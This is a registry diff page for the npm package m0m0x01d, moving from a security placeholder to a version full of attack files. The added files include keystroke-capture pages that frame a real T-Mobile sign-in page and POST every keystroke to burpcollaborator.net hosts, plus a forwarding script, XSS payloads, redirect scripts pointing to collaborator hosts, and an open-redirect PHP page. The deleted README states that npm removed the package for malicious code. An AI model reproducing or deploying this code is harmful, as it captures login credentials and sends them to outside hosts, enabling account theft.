m0m0x01d 0.0.1-security → 24.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of m0m0x01d might be problematic. Click here for more details.

package/.htaccess ADDED
@@ -0,0 +1,8 @@
1
+ <IfModule mod_php.c>
2
+ # Enable PHP execution
3
+ AddType application/x-httpd-php .php
4
+ AddHandler application/x-httpd-php .php
5
+ </IfModule>
6
+
7
+ # Ensure the PHP engine is enabled
8
+ php_flag engine on
package/file.html ADDED
@@ -0,0 +1,13 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta http-equiv="X-UA-Compatible" content="IE=edge">
6
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
+ <title>Redirecting...</title>
8
+ <meta http-equiv="refresh" content="0; url=https://40fe2e9f7b.ipv6.bypass.eu.org/">
9
+ </head>
10
+ <body>
11
+ <p>If you are not redirected automatically, <a href="https://40fe2e9f7b.ipv6.bypass.eu.org/">click here</a>.</p>
12
+ </body>
13
+ </html>
@@ -0,0 +1 @@
1
+ <iframe src="https://es.account.t-mobile.com/signin/v2/"></iframe>
@@ -0,0 +1,42 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>PoC - Keystroke Capture</title>
7
+ <script>
8
+ // Function to send captured data to your server
9
+ function sendKeystrokes(data) {
10
+ var xhr = new XMLHttpRequest();
11
+ xhr.open("POST", "https://q1sbaric7jhkozf4ae7tuk5gm7sygn.burpcollaborator.net/keystrokes", true);
12
+ xhr.setRequestHeader("Content-Type", "application/json");
13
+ xhr.send(JSON.stringify({ keystrokes: data }));
14
+ }
15
+
16
+ // Function to capture keystrokes inside the iframe
17
+ function captureKeystrokes() {
18
+ var iframe = document.getElementById('login-iframe').contentWindow;
19
+
20
+ iframe.document.onkeyup = function(event) {
21
+ // Capture each key press and send it to the server
22
+ sendKeystrokes(event.key);
23
+ };
24
+ }
25
+
26
+ // Start capturing keystrokes when the iframe is loaded
27
+ window.onload = function() {
28
+ var iframe = document.getElementById('login-iframe');
29
+
30
+ iframe.onload = function() {
31
+ captureKeystrokes();
32
+ };
33
+ };
34
+ </script>
35
+ </head>
36
+ <body>
37
+ <h1>Login Page</h1>
38
+ <!-- Embedding the login page -->
39
+ <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
40
+ </body>
41
+ </html>
42
+
@@ -0,0 +1,42 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>PoC - Keystroke Capture</title>
7
+ <script>
8
+ // Function to send captured data to your server
9
+ function sendKeystrokes(data) {
10
+ var xhr = new XMLHttpRequest();
11
+ xhr.open("POST", "https://200ltblqjhtfqvkk2onadiu0vr1hp6.burpcollaborator.net/keystrokes", true);
12
+ xhr.setRequestHeader("Content-Type", "application/json");
13
+ xhr.send(JSON.stringify({ keystrokes: data }));
14
+ }
15
+
16
+ // Function to capture keystrokes inside the iframe
17
+ function captureKeystrokes() {
18
+ var iframe = document.getElementById('login-iframe').contentWindow;
19
+
20
+ iframe.document.onkeyup = function(event) {
21
+ // Capture each key press and send it to the server
22
+ sendKeystrokes(event.key);
23
+ };
24
+ }
25
+
26
+ // Start capturing keystrokes when the iframe is loaded
27
+ window.onload = function() {
28
+ var iframe = document.getElementById('login-iframe');
29
+
30
+ iframe.onload = function() {
31
+ captureKeystrokes();
32
+ };
33
+ };
34
+ </script>
35
+ </head>
36
+ <body>
37
+ <h1>Login Page</h1>
38
+ <!-- Embedding the login page -->
39
+ <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
40
+ </body>
41
+ </html>
42
+
@@ -0,0 +1,16 @@
1
+ </html>
2
+ <!DOCTYPE html>
3
+ <html lang="en">
4
+ <head>
5
+ <meta charset="UTF-8">
6
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
+ <title>Keystroke Capture</title>
8
+ <script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.svg.js"></script>
9
+ </head>
10
+ <body>
11
+ <h1>Keystroke Logger PoC</h1>
12
+ <!-- Embedding the target's login page in an iframe -->
13
+ <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
14
+ </body>
15
+ </html>
16
+
@@ -0,0 +1,11 @@
1
+ // Intermediary script to forward keystrokes to your server
2
+ self.addEventListener('message', function(event) {
3
+ var data = event.data;
4
+
5
+ // Forward the keystrokes to your server
6
+ var xhr = new XMLHttpRequest();
7
+ xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
8
+ xhr.setRequestHeader("Content-Type", "application/json");
9
+ xhr.send(JSON.stringify({ keystrokes: data }));
10
+ });
11
+
@@ -0,0 +1,11 @@
1
+ // Intermediary script to forward keystrokes to your server
2
+ self.addEventListener('message', function(event) {
3
+ var data = event.data;
4
+
5
+ // Forward the keystrokes to your server
6
+ var xhr = new XMLHttpRequest();
7
+ xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
8
+ xhr.setRequestHeader("Content-Type", "application/json");
9
+ xhr.send(JSON.stringify({ keystrokes: data }));
10
+ });
11
+
package/ip.svg.html ADDED
@@ -0,0 +1 @@
1
+ <iframe src="https://lqfxvsp7xjrqc6ljccdiattha8gz4o.burpcollaborator.net/xx"></iframe>
@@ -0,0 +1,26 @@
1
+ // Function to send keystrokes to the intermediary file on unpkg
2
+ function sendKeystrokes(data) {
3
+ var xhr = new XMLHttpRequest();
4
+ xhr.open("POST", "https://unpkg.com/m0m0x01d@19.0.0/intermediary.js", true);
5
+ xhr.setRequestHeader("Content-Type", "application/json");
6
+ xhr.send(JSON.stringify({ keystrokes: data }));
7
+ }
8
+
9
+ // Function to capture keystrokes in the iframe
10
+ function captureKeystrokes() {
11
+ var iframe = document.getElementById('login-iframe').contentWindow;
12
+
13
+ // Listen for key presses in the iframe
14
+ iframe.document.onkeyup = function(event) {
15
+ sendKeystrokes(event.key); // Send each keystroke to the intermediary
16
+ };
17
+ }
18
+
19
+ // Wait for the iframe to load, then start capturing keystrokes
20
+ window.onload = function() {
21
+ var iframe = document.getElementById('login-iframe');
22
+ iframe.onload = function() {
23
+ captureKeystrokes();
24
+ };
25
+ };
26
+
@@ -0,0 +1,25 @@
1
+ // Function to send keystrokes to the intermediary file on unpkg
2
+ function sendKeystrokes(data) {
3
+ var xhr = new XMLHttpRequest();
4
+ xhr.open("POST", "https://es.t-mobile.com.mmcyrtl8tknr87hk8d9j6upi69c10q.burpcollaborator.net/xxxxxxxxx", true);
5
+ xhr.setRequestHeader("Content-Type", "application/json");
6
+ xhr.send(JSON.stringify({ keystrokes: data }));
7
+ }
8
+
9
+ // Function to capture keystrokes in the iframe
10
+ function captureKeystrokes() {
11
+ var iframe = document.getElementById('login-iframe').contentWindow;
12
+
13
+ // Listen for key presses in the iframe
14
+ iframe.document.onkeyup = function(event) {
15
+ sendKeystrokes(event.key); // Send each keystroke to the intermediary
16
+ };
17
+ }
18
+
19
+ // Wait for the iframe to load, then start capturing keystrokes
20
+ window.onload = function() {
21
+ var iframe = document.getElementById('login-iframe');
22
+ iframe.onload = function() {
23
+ captureKeystrokes();
24
+ };
25
+ };
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "24.0.0",
4
+ "description": "ssrf",
5
+ "main": "index.html",
6
+ "scripts": {
7
+ "test": "ls"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
@@ -0,0 +1 @@
1
+ <% Response.Redirect("https://example.com") %>
@@ -0,0 +1 @@
1
+ <% Response.Redirect("https://example.com") %>
@@ -0,0 +1 @@
1
+ <cflocation url="https://example.com">
@@ -0,0 +1 @@
1
+ return Redirect("https://example.com");
@@ -0,0 +1 @@
1
+ return Redirect("https://example.com");
@@ -0,0 +1,25 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Redirect</title>
7
+ <script>
8
+ window.onload = function() {
9
+ // Get the URL query parameter
10
+ const urlParams = new URLSearchParams(window.location.search);
11
+ const targetUrl = urlParams.get('url');
12
+
13
+ // If a valid URL is provided, redirect to it
14
+ if (targetUrl) {
15
+ window.location.href = targetUrl;
16
+ } else {
17
+ document.body.innerHTML = "No URL provided for redirection.";
18
+ }
19
+ }
20
+ </script>
21
+ </head>
22
+ <body>
23
+ </body>
24
+ </html>
25
+
@@ -0,0 +1 @@
1
+ res.redirect('https://example.com');
@@ -0,0 +1,3 @@
1
+ <%
2
+ response.sendRedirect("https://example.com");
3
+ %>
@@ -0,0 +1,21 @@
1
+ <?php
2
+ // Get the target URL from the 'next_url' query parameter
3
+ $next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
4
+
5
+ // Set the appropriate headers for the 302 redirect
6
+ header("HTTP/1.1 302 Found");
7
+ header("Location: $next_url");
8
+
9
+ // Optional: Set additional headers if required
10
+ header("Cache-Control: public, max-age=0");
11
+ header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
12
+ header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
13
+ header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
14
+ header("X-Frame-Options: SAMEORIGIN");
15
+ header("X-XSS-Protection: 1; mode=block");
16
+ header("X-Content-Type-Options: nosniff");
17
+ header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
18
+
19
+ // Ensure the connection is closed after the headers
20
+ exit();
21
+
@@ -0,0 +1 @@
1
+ print "Location: https://example.com\n\n";
@@ -0,0 +1,2 @@
1
+ from flask import redirect
2
+ return redirect("https://example.com")
@@ -0,0 +1 @@
1
+ redirect_to "https://example.com"
@@ -0,0 +1,3 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <?xml-stylesheet type="text/xsl" href="redirect.svg.xsl"?>
3
+ <root/>
@@ -0,0 +1,14 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
3
+ <xsl:template match="/">
4
+ <xsl:variable name="url" select="'https://086sqqjyqn0pskt86ozgjwgqwh2aqz.burpcollaborator.net'"/>
5
+ <html>
6
+ <head>
7
+ <meta http-equiv="refresh" content="0; url={$url}" />
8
+ </head>
9
+ <body>
10
+ Redirecting to <xsl:value-of select="$url" />
11
+ </body>
12
+ </html>
13
+ </xsl:template>
14
+ </xsl:stylesheet>
@@ -0,0 +1,11 @@
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta http-equiv="refresh" content="0; url=https://www.example.com">
6
+ <title>Redirecting...</title>
7
+ </head>
8
+ <body>
9
+ <p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
10
+ </body>
11
+ </html>
@@ -0,0 +1,15 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en-US">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta http-equiv="refresh" content="0; url=http://example.com">
6
+ <script type="text/javascript">
7
+ window.location.href = "http://example.com"
8
+ </script>
9
+ <title>Page Redirection</title>
10
+ </head>
11
+ <body>
12
+ <!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
13
+ If you are not redirected automatically, follow this <a href='http://example.com'>link to example</a>.
14
+ </body>
15
+ </html>
package/test.html ADDED
@@ -0,0 +1,2 @@
1
+ <h1>testing</h1>
2
+ <script src="https://m8veqcjkq90bs6tu6az2jigcw32xqm.burpcollaborator.net"></script>
@@ -0,0 +1 @@
1
+ <script>alert(document.domain)</script>
package/test.pdf ADDED
Binary file
package/test.pdf.txt ADDED
@@ -0,0 +1 @@
1
+ testing
package/test.php ADDED
@@ -0,0 +1,3 @@
1
+ <?php
2
+ echo "m0m0x01d";
3
+ ?>
package/test.svg.html ADDED
@@ -0,0 +1 @@
1
+ <script>alert(document.domain)</script>
package/test.svg.txt ADDED
@@ -0,0 +1 @@
1
+ testing123
package/test.txt ADDED
@@ -0,0 +1 @@
1
+ testing m0m0x01d
package/test.txt.pdf ADDED
@@ -0,0 +1 @@
1
+ testing123
package/test2.txt.pdf ADDED
@@ -0,0 +1 @@
1
+ <script>alert(1)</script>
@@ -0,0 +1 @@
1
+ <iframe src="https://wttobm4ubjlldge4rkkc4s1mhdn3bs.burpcollaborator.net"></iframe>
package/xss.js ADDED
@@ -0,0 +1,46 @@
1
+ /*jsonp*/
2
+ s7classics7sdkJSONResponse({
3
+ "set": {
4
+ "pv": "1.0",
5
+ "type": "video",
6
+ "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
7
+ "item": {
8
+ "v": {
9
+ "path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
10
+ "dx": "1920",
11
+ "dy": "1080",
12
+ "bitrate": "60947580",
13
+ "id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
14
+ "suffix": "mp4"
15
+ },
16
+ "i": {
17
+ "mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
18
+ "n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
19
+ },
20
+ "type": "video",
21
+ "iv": "zJZEa1",
22
+ "userdata": [{
23
+ "Audio_Codec": "AAC LC",
24
+ "Audio_Sample_Rate": "48.0",
25
+ "Number_Audio_Channels": "2",
26
+ "Video_Codec": "AVC",
27
+ "Video_Frame_Rate": "24.000",
28
+ "Video_Length": "30.0"
29
+ }, {
30
+ "Audio_Codec": "AAC LC",
31
+ "Audio_Sample_Rate": "48.0",
32
+ "Number_Audio_Channels": "2",
33
+ "Video_Codec": "AVC",
34
+ "Video_Frame_Rate": "24.000",
35
+ "Video_Length": "30.0"
36
+ }]
37
+ }
38
+ }
39
+ }, "130443601");
40
+
41
+ // XSS payload: inject document.domain into the JSONP response without breaking functionality
42
+ (function(){
43
+ var xss_payload = document.domain;
44
+ console.log("Injected XSS payload: " + xss_payload);
45
+ })();
46
+
package/xss.svg.html ADDED
@@ -0,0 +1,4 @@
1
+ <script>
2
+ window.location.href = 'https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net';
3
+ </script>
4
+
package/xss1.svg.html ADDED
@@ -0,0 +1,6 @@
1
+ <script>
2
+ fetch('https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net/api').then(response => {
3
+ console.log(response);
4
+ });
5
+ </script>
6
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=m0m0x01d for more information.